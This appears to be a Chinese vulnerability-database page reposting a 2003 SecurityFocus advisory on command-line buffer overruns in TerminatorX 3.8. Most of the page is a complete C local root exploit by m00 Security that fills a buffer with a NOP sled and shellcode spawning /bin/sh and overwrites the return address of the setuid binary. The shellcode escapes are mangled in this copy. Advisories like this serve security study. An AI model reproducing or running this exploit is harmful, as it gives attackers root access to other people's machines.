TerminatorX 3.8 – Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)
漏洞ID | 1054236 | 漏洞类型 | |
发布时间 | 2003-11-07 | 更新时间 | 2003-11-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8993/info
It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root.
/*******************************************************
* terminatorX v3.80 - local root exploit
* by m00 Security / Over_G
*
* overg[at]mail.ru www.m00.ru
*
* Bugs discovered by c0wboy
********************************************************/
#include <stdio.h>
#include <stdlib.h>
char shellcode[] = "x31xdbx89xd8xb0x17xcdx80"
"x31xdbx89xd8xb0x2excdx80"
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx62x69x6ex89xe3x50"
"x53x89xe1x31xd2xb0x0bxcd"
"x80x31xdbx89xd8xb0x01xcdx80";
unsigned long ret = 0xbffffaaa;
int main(int argc, char ** argv)
{
int i,offset;
char buffer[1266];
if(argv[1]) { offset=atoi(argv[1]);
ret = ret - offset; }
for (i=0; i < (259-strlen(shellcode));i++) buffer[i]=0x90;
memcpy((buffer+259-strlen(shellcode)),shellcode,strlen(shellcode));
memcpy((buffer+259),"A",1);
memcpy((buffer+260), (char*)&ret, 4);
printf("nterminatorX v3.80 - local root exploit by m00 Security / Over_Gn www.m00.ru OverG[at]mail.runn");
printf("Using ret: 0x%08x n",ret);
execl("/usr/local/bin/terminatorX","terminatorX","-f",buffer,NULL);
}
相关推荐: Slackware 7.0/7.1/8.0 – Manual Page Cache File Creation
Slackware 7.0/7.1/8.0 – Manual Page Cache File Creation 漏洞ID 1053547 漏洞类型 发布时间 2001-07-17 更新时间 2001-07-17 CVE编号 N/A CNNVD-ID N/A 漏…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666